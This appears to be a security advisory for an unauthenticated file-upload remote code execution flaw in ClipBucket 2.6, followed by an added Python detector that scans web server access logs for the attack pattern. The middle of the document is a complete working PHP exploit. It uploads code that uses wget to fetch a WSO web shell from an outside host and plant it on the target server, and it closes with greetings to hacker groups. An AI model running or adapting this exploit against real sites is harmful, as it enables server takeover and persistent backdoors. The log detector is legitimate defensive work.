
ClipBucket /admin_area/charts/ofc-library/ofc_upload_image.php Remote Code Execution Vulnerability

Published: 2013-10-02
Updated: 2013-11-01
Affected systems:
ClipBucket ClipBucket 2.6
Description:
--------------------------------------------------------------------------------
ClipBucket is open-source, free video sharing software. In ClipBucket 2.6 the "/admin_area/charts/ofc-library/ofc_upload_image.php" script accepts an upload of arbitrary code without any authentication, which can lead to an arbitrary shell being uploaded to the server.<*Source: vendor

  Link: http://192.168.7.140/vul_2.php?vul_id=24181#vul_affect
*>
Test method:
--------------------------------------------------------------------------------
Warning: the following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users act at their own risk!

```php
#################################################################################################
# __________.__           _________                              _________
# \__    ___/|  |__ ____ \_ ___ \_______  ______  _  ________ \_ ___ \_______ ______  _  __
# |    | |  |  \_/ __   /      /\_  __ /  _ / / /  ___/ /      /\_  __ \_/ __ / / /
# |    | | Y    ___/     \____|  | (  <_> )   /\___      \____|  | /  ___/   /
# |____| |___|  /\___  >  \______  /|__| \____/ /\_//____  >  \______  /|__|    \___  >/\_/
#               /   /          /                       /          /           /
#
#
#http://thecrowscrew.org
#################################################################################################
# Exploit title : ClipBucket Remote Code Execution Vulnerability
# Author : Gabby
# Dork = use ur brain ;)
# Vendor Site : http://clip-bucket.com/
# Software Download : http://sourceforge.net/projects/clipbucket/
#################################################################################################
<?php 
$options = getopt("t:n:");
if(!isset($options["t"], $options["n"]))
die("       [+] Simple Exploiter ClipBucket by Gabby [+] Usage : php clip.php -t http://target.com -n bie.php
-t http://target.com = Target mu ..
-n bie.php           = Nama file yang mau kamu pakai... "); 
 
$target =  $options["t"];
$nama =  $options["n"];
$shell  = "{$target}/admin_area/charts/tmp-upload-images/{$nama}";
$target = "{$target}/admin_area/charts/ofc-library/ofc_upload_image.php?name={$nama}";
$data = "<?php
system("wget http://gabby.ga/shell/wso.txt; mv wso.txt bie.php");
fclose ( $handle );
?>";
$headers = array("User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1",
"Content-Type: text/plain");
echo "============================================ ";
echo ": Simple Exploiter ClipBucket by Gabby : ";
echo "============================================ ";
echo "[+] Upload Shell ke : {$options["t"]} ";
$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $target);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
$source = curl_exec($handle);
curl_close($handle);
if(!strpos($source, "Undefined variable: HTTP_RAW_POST_DATA") && @fopen($shell, "r"))
{
echo "[+] Exploit Sukses,.. :D ";
echo "[+] {$shell} ";
}
else
{
die("[-] Exploit Gagal,.. :( ");
}
 
?>
```

See the screenshots:
1. http://i.imgur.com/SZGVraC.png
2. http://i.imgur.com/1X0WzeH.png
#################################################################################################
Thanks to :
Catalyst71, kit4r0, 777r, ovanIsmycode, walangkaji, y0g4, my "Dad", my sista Wii, cW3 G4pt3K,
Red-x, Vanda, Deb, Sultan, Meninbox, n all my luvly friend,..
Greets to :
Yogyacarderlink, SurabayaBlackhat,..^^
#################################################################################################
Recommendation:
--------------------------------------------------------------------------------
Vendor patch: ClipBucket
----------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version: http://clip-bucket.com/
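Until a vendor fix is available, the traffic pattern described above (an unauthenticated POST to ofc_upload_image.php naming a script file, followed by a request for that file from tmp-upload-images) can be picked out of the web server access log. The following detector is an added example written for this advisory, not code from the original post or from ClipBucket; it assumes Apache combined log format, and the log lines and the list of executable extensions are constructed for the example.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample lines in Apache combined log format (not real traffic).
# They model the pattern in the advisory: an unauthenticated POST to
# ofc_upload_image.php with a script name in the "name" parameter, followed
# by a request for that file from the tmp-upload-images directory.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Oct/2013:10:15:01 +0000] "POST /admin_area/charts/ofc-library/ofc_upload_image.php?name=bie.php HTTP/1.1" 200 57 "-" "Mozilla/5.0"
10.0.0.6 - - [02/Oct/2013:10:15:07 +0000] "GET /admin_area/charts/tmp-upload-images/bie.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.7 - - [02/Oct/2013:10:16:00 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.8 - - [02/Oct/2013:10:17:00 +0000] "POST /admin_area/charts/ofc-library/ofc_upload_image.php?name=chart.png HTTP/1.1" 200 57 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

UPLOAD_SCRIPT = "/admin_area/charts/ofc-library/ofc_upload_image.php"
TMP_DIR = "/admin_area/charts/tmp-upload-images/"
# Extensions a PHP-enabled server would execute; an assumed list, extend as needed.
EXEC_EXT = (".php", ".phtml", ".php3", ".php5", ".phar")


def classify(line):
    """Return (finding, client_ip, detail) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m["target"])
    if m["method"] == "POST" and url.path == UPLOAD_SCRIPT:
        # The script needs no authentication, so every POST to it is worth
        # recording; a script extension or a path component in "name" is worse.
        name = parse_qs(url.query).get("name", [""])[0]
        if name.lower().endswith(EXEC_EXT) or "/" in name or "\\" in name or ".." in name:
            return ("upload_executable", m["ip"], name)
        return ("upload", m["ip"], name)
    if url.path.startswith(TMP_DIR) and url.path.lower().endswith(EXEC_EXT):
        # A script fetched from the chart temp directory: the uploaded file being run.
        return ("exec_from_tmp", m["ip"], url.path)
    return None


def scan(log_text):
    """Classify every line of an access log and return the findings in order."""
    return [f for f in map(classify, log_text.splitlines()) if f]
```

Running scan() over a real log yields one tuple per hit; an "upload_executable" followed by "exec_from_tmp" for the same file name is the sequence the exploit above produces.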